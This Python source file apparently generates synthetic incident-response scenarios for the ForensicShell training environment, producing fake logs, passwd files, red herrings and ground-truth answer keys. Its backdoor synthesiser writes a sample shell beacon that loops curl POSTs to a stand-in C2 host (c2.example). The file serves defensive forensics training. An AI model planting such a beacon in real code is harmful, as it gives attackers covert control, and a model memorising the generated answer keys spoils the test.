Spaces:
Sleeping
Sleeping
| """ | |
| Procedural scenario generator for ForensicShell. | |
| Pure function of (seed, difficulty, pattern). Identical inputs always produce | |
| identical scenarios, so seeds work as train/val/test splits and make curricula | |
| reproducible. No global random state is touched. | |
| Public API: | |
| generate_scenario(seed, difficulty=3, pattern=None) -> dict | |
| The returned dict has the same shape as the hand-authored SCENARIO_1/2/3 in | |
| scenarios.py β it is a drop-in replacement the env can load through reset(). | |
| Difficulty tiers: | |
| 1 easy user + ip | |
| 2 medium + modified_files + backdoor_sha256 | |
| 3 medium+ same as 2 but more noise | |
| 4 hard + timeline, with red-herring content | |
| 5 hard+ same as 4 with extra red herrings and more complex timeline | |
| """ | |
| from __future__ import annotations | |
| import hashlib | |
| import random | |
| from datetime import datetime, timedelta | |
| from types import SimpleNamespace | |
| from typing import Dict, Optional | |
| from .attack_patterns import PATTERNS | |
| from .name_pools import ( | |
| DECOY_USERS, | |
| HOSTNAMES, | |
| sample_hostname, | |
| sample_internal_ip, | |
| sample_public_ip, | |
| sample_username, | |
| ) | |
| # --------------------------------------------------------------------------- | |
| # Deterministic seed β backdoor bytes | |
| # --------------------------------------------------------------------------- | |
| def _synth_backdoor(seed: int, pattern: str) -> tuple[bytes, str, str]: | |
| """ | |
| Return (bytes, sha256_hex, short_slug). Byte content is deterministic in | |
| (seed, pattern) so two generated scenarios with the same seed/pattern have | |
| the same SHA256 β matches what the grader will compare against. | |
| """ | |
| short = hashlib.md5(f"{seed}-{pattern}".encode()).hexdigest()[:6] | |
| header = ( | |
| f"#!/bin/sh\n" | |
| f"# synthetic payload {pattern}\n" | |
| f"# seed={seed} slug={short}\n" | |
| ).encode() | |
| body = ( | |
| f"while :; do\n" | |
| f" curl -s -X POST http://c2.example/beacon -d \"id={short}\"\n" | |
| f" sleep 60\n" | |
| f"done\n" | |
| ).encode() | |
| payload = header + body + hashlib.sha256(f"{seed}|{pattern}".encode()).digest() | |
| return payload, hashlib.sha256(payload).hexdigest(), short | |
| def _backdoor_path_for(pattern_tag: str, short: str, user: str) -> str: | |
| """Where the pattern drops its persistence blob.""" | |
| if pattern_tag == "webshell": | |
| return f"/var/www/html/.{short}.bin" | |
| if pattern_tag == "supply_chain": | |
| return f"/tmp/.{short}" | |
| if pattern_tag == "insider": | |
| return "/tmp/.staging/dump.sql" | |
| if pattern_tag == "ssh_key_theft": | |
| return f"/usr/local/sbin/.{short}" | |
| return f"/usr/local/bin/.{short}" | |
| # --------------------------------------------------------------------------- | |
| # Filesystem + ground-truth assembly | |
| # --------------------------------------------------------------------------- | |
| def _legit_noise_auth_log(rng, host: str, ts_base: datetime, lines: int = 8) -> list[str]: | |
| """Render benign, plausible auth log entries to pad the log.""" | |
| out = [] | |
| for i in range(lines): | |
| ts = ts_base - timedelta(hours=rng.randint(1, 72), minutes=rng.randint(0, 59)) | |
| who = rng.choice(["ops", "alice", "bob", "jenkins", "monitoring", "deploy"]) | |
| internal = "10.0.0." + str(rng.randint(2, 200)) | |
| kind = rng.choice(["Accepted publickey", "session opened", "Received disconnect"]) | |
| if kind == "Accepted publickey": | |
| out.append( | |
| f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " | |
| f"Accepted publickey for {who} from {internal} port {rng.randint(30000, 65000)} ssh2" | |
| ) | |
| elif kind == "session opened": | |
| out.append( | |
| f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " | |
| f"pam_unix(sshd:session): session opened for user {who} by (uid=0)" | |
| ) | |
| else: | |
| out.append( | |
| f"{ts.strftime('%b %d %H:%M:%S')} {host} sshd[{rng.randint(100, 9999)}]: " | |
| f"Received disconnect from {internal} port {rng.randint(30000, 65000)}:11: disconnected by user" | |
| ) | |
| return out | |
| def _passwd_file(main_user: str, rng) -> str: | |
| users = list(DECOY_USERS) + [main_user] | |
| rng.shuffle(users) | |
| lines = ["root:x:0:0:root:/root:/bin/bash"] | |
| uid = 1000 | |
| for u in users: | |
| lines.append(f"{u}:x:{uid}:{uid}:{u.title()},,,:/home/{u}:/bin/bash") | |
| uid += 1 | |
| return "\n".join(lines) + "\n" | |
| def _red_herrings(rng, host: str, ts_base: datetime, intensity: int) -> dict: | |
| """ | |
| Inject decoy content at difficulty >= 4. | |
| Returns a dict of extra filesystem entries. None of these should end up in | |
| ground_truth.modified_files. | |
| intensity: 1 (diff 4) or 2 (diff 5+). | |
| """ | |
| extras = {} | |
| # 1. Decoy auth.log.1 with a failed-login probe from an unrelated IP | |
| decoy_ip = sample_public_ip(rng) | |
| extras["/var/log/auth.log.1"] = ( | |
| f"{(ts_base - timedelta(days=1)).strftime('%b %d %H:%M:%S')} {host} " | |
| f"sshd[101]: Failed password for invalid user admin from {decoy_ip} " | |
| f"port {rng.randint(30000, 65000)} ssh2\n" | |
| f"{(ts_base - timedelta(days=1, minutes=-3)).strftime('%b %d %H:%M:%S')} {host} " | |
| f"sshd[104]: Received disconnect from {decoy_ip}: [preauth]\n" | |
| ) | |
| # 2. A decoy user's bash_history with suspicious-looking-but-benign commands | |
| decoy_user = rng.choice(DECOY_USERS) | |
| extras[f"/home/{decoy_user}/.bash_history"] = ( | |
| "ls -la\n" | |
| "sudo systemctl status cron\n" | |
| "curl https://api.github.com/users/torvalds\n" | |
| "python3 -m http.server 8000 &\n" | |
| "pkill -f http.server\n" | |
| ) | |
| if intensity >= 2: | |
| # 3. A /tmp/.cache binary with random bytes β agent might stat/sha it and submit wrongly | |
| junk = hashlib.sha256(f"decoy-{rng.random()}".encode()).digest() * 4 | |
| extras["/tmp/.cache"] = junk | |
| # 4. A decoy cron that looks suspicious but is benign | |
| extras["/etc/cron.d/backup-nightly"] = ( | |
| "# Nightly backup β owned by ops team\n" | |
| "0 4 * * * root /usr/local/sbin/backup.sh >/dev/null 2>&1\n" | |
| ) | |
| return extras | |
| # --------------------------------------------------------------------------- | |
| # Main public function | |
| # --------------------------------------------------------------------------- | |
| def generate_scenario( | |
| seed: int, | |
| difficulty: int = 3, | |
| pattern: Optional[str] = None, | |
| ) -> Dict: | |
| """ | |
| Deterministic scenario generator. | |
| Args: | |
| seed: any integer β identical inputs yield identical scenarios | |
| difficulty: 1..5 (clamped) | |
| pattern: one of attack_patterns.PATTERNS keys; if None, picked from seed | |
| Returns: | |
| dict with keys: task_id, difficulty, description, filesystem, ground_truth | |
| """ | |
| if difficulty < 1: | |
| difficulty = 1 | |
| if difficulty > 5: | |
| difficulty = 5 | |
| rng = random.Random(int(seed)) | |
| # 1. pick pattern | |
| if pattern is None: | |
| pattern = rng.choice(list(PATTERNS.keys())) | |
| if pattern not in PATTERNS: | |
| raise ValueError(f"unknown pattern: {pattern}") | |
| # 2. sample entities | |
| host = sample_hostname(rng) | |
| main_user = sample_username(rng) | |
| if pattern == "insider": | |
| attacker_ip = sample_internal_ip(rng) | |
| else: | |
| attacker_ip = sample_public_ip(rng) | |
| # 3. base timestamp β always in 2025, deterministic | |
| day_offset = rng.randint(0, 365) | |
| hour = rng.randint(8, 22) | |
| minute = rng.randint(0, 59) | |
| ts_base = datetime(2025, 1, 1) + timedelta(days=day_offset, hours=hour, minutes=minute) | |
| # 4. synthesize backdoor payload | |
| bd_bytes, bd_sha, short = _synth_backdoor(int(seed), pattern) | |
| bd_path = _backdoor_path_for(pattern, short, main_user) | |
| ctx = SimpleNamespace( | |
| rng=rng, | |
| user=main_user, | |
| ip=attacker_ip, | |
| host=host, | |
| ts_base=ts_base, | |
| backdoor_bytes=bd_bytes, | |
| backdoor_sha256=bd_sha, | |
| backdoor_path=bd_path, | |
| short=short, | |
| ) | |
| # 5. run the pattern template | |
| pattern_fn = PATTERNS[pattern] | |
| result = pattern_fn(ctx) | |
| # 6. build filesystem | |
| noise = _legit_noise_auth_log(rng, host, ts_base, lines=6) | |
| auth_log = "\n".join(noise + result["auth_log_lines"]) + "\n" | |
| filesystem: Dict[str, object] = { | |
| "/var/log/auth.log": auth_log, | |
| f"/home/{main_user}/.bash_history": result["bash_history"], | |
| "/etc/passwd": _passwd_file(main_user, rng), | |
| "/etc/hostname": f"{host}\n", | |
| f"/home/{main_user}/readme.txt": f"{main_user}'s home dir.\n", | |
| } | |
| # add pattern-specific modified files | |
| for path, content in result["modified_files"].items(): | |
| filesystem[path] = content | |
| # 7. red herrings | |
| if difficulty >= 4: | |
| intensity = 1 if difficulty == 4 else 2 | |
| herrings = _red_herrings(rng, host, ts_base, intensity) | |
| for path, content in herrings.items(): | |
| if path in filesystem: | |
| continue # never overwrite a real artifact | |
| filesystem[path] = content | |
| # 8. path-collision sanity check (duplicate keys impossible in a dict, but | |
| # ensure every ground-truth path actually exists in the filesystem) | |
| for p in result["modified_paths"]: | |
| assert p in filesystem, f"ground-truth path not in filesystem: {p}" | |
| # 9. assemble ground truth by difficulty tier | |
| gt: Dict = { | |
| "compromised_user": main_user, | |
| "initial_ip": attacker_ip, | |
| } | |
| if difficulty >= 2: | |
| gt["modified_files"] = list(result["modified_paths"]) | |
| gt["backdoor_sha256"] = bd_sha | |
| if difficulty >= 4: | |
| gt["timeline"] = list(result["timeline"]) | |
| task_id = f"gen_{int(seed)}_d{difficulty}_{pattern}" | |
| description = _describe(difficulty, pattern, main_user, host) | |
| return { | |
| "task_id": task_id, | |
| "difficulty": _difficulty_label(difficulty), | |
| "description": description, | |
| "filesystem": filesystem, | |
| "ground_truth": gt, | |
| } | |
| # --------------------------------------------------------------------------- | |
| # Small helpers | |
| # --------------------------------------------------------------------------- | |
| def _difficulty_label(d: int) -> str: | |
| return {1: "easy", 2: "medium", 3: "medium", 4: "hard", 5: "hard"}.get(d, "medium") | |
| def _describe(difficulty: int, pattern: str, user: str, host: str) -> str: | |
| base = ( | |
| f"Host '{host}' was compromised. Investigate the filesystem to determine " | |
| f"what happened. Start by reading /var/log/auth.log and the shell histories " | |
| f"under /home." | |
| ) | |
| if difficulty == 1: | |
| return ( | |
| f"{base} Report: compromised_user and initial_ip only. " | |
| f"(Pattern: {pattern})" | |
| ) | |
| if difficulty in (2, 3): | |
| return ( | |
| f"{base} Report: compromised_user, initial_ip, modified_files " | |
| f"(absolute paths), and the SHA256 of the attacker-dropped backdoor. " | |
| f"(Pattern: {pattern})" | |
| ) | |
| return ( | |
| f"{base} Report: compromised_user, initial_ip, modified_files, " | |
| f"backdoor_sha256, AND an ordered kill-chain timeline with phases " | |
| f"login -> recon -> privesc -> persistence -> exfil. Red herrings may be " | |
| f"present. (Pattern: {pattern})" | |
| ) | |